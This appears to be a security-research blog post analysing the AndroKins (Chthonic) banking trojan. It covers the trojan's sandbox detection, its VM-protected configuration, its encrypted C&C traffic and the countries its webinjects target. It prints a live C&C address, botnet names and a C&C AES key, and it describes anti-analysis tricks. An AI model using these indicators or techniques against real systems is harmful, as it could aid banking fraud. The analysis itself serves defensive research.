Androkins — also known as Chthonic (1) — is a hybrid malware created by the combination of two other: Andromeda (2) and KINS (3), hence the name AndroKins. The former one is a HTTP based bot with anti-reverse engineering tricks. The latter is a Zeus based banking trojan, also called ZeusVM, because it comes with a small embedded virtual machine that protects and hides the malware’s built-in configuration. Therefore, the resulting malware of this merge has both properties: a malware with capabilities to commit banking fraud, and at the same time an extremely cumbersome sample for researchers to analyze.

Another interesting fact about Androkins is its C&C infrastructure, whereas instead of regular top level domains, .bit addresses are used. These special domain names are tied to a virtual currency called NameCoin (4) and its objective is to provide anonymity (similarly to the concept of TOR).

Bypassing VMware detection

When launching a sample of AndroKins the first we notice is the creation of a new process msiexec.exe. This is a common injection technique, when malicious code is injected into an image of
a legitimate process. However, besides this observation, nothing else seems to happen. No connections to any remote site occurs. Attaching a debugger into msiexec.exe we shortly notice that
we have entered into an infinite loop, which is the malware’s default behavior when a sandbox is detected:

Infinite loop — Sanbox detection

From experience, it is not recommended to patch the conditional jump shown at the address 400a80h, because the function vm_detect also performs some initializations and without them the
malware may not behave as expected. So, the best approach here is to enter into the function and go very carefully step by step.

Getting the malware’s internal configuration

The malware’s configuration was encrypted by a polymorphic algorithm before built-in into the malware. The algorithm then has been converted into a set of custom CPU instructions which is interpreted by the small embedded virtual machine that AndroKins comes with. For someone who had already analyzed ZeusVM it can be an easy task to pinpoint the dispatcher routine that executes those instructions one by one:

Virtual Machine dispatcher routine in AndroKins

Passing through this subroutine, we can dump the malware’s internal configuration which looks like this:

Embedded configuration

Within this configuration we can obtain a few important informations:

  • http://letit2.bit/, C&C server
  • taver4, name of this botnet. Other known botnets by us are: bit103, bit110d, craft, gold,
    maza, maza2, metro, moon, seven, star, taver2, taver3, trade, trade2, trade3, trio, wienna
  • DE27CA69A5070F2D9A83CA1933285C76, AES key for encryption/decryption of C&C

As mentioned earlier, the .bit domain is a special domain and cannot be resolved by default. To bypass this, Androkins has a list of foreign DNS servers. This list is encrypted alongside with the rest of the strings by a custom algorithm (not VM protected):

String decryption routine

By enumerating all the indexes from zero to a high number (255) we can get all the encrypted strings from Androkins, which will include the foreign DNS servers that are able to resolve .bit addresses. These IP addresses are not malicious by themselves:

Decrypting C&C communication

Requests made to the control panel are encrypted with AES and a custom XOR algorithm which goes by the name VisualXor (it should be familiar for you if you dealt with ZeusVM). So, the first call to the control panel is a request that includes list of running processes, bot id, botnet, version number, md5 of dropper, RDTSC timestamp counter values and some other not yet discovered values:

Encrypted request to the C&C

Decrypted request

Fortunately the server is not sensitive to if you had ollydbg.exe running in your environment and the server responses with additional components which are further encrypted and even compressed through different layers which can get quite voluminous to go all over…

Targeted Countries

We have also gathered the webinject configurations from the different botnets. Web injection is a technique where HTML or Javascript code is inserted into the infected victim’s sessions when the victim visits one of the targeted websites. Based on the malware’s webinjection filters, Androkins poses the most risk to financial sectors in Italy, Canada, Greece and Turkey.










Recent Posts
pingbacks / trackbacks

Leave a Comment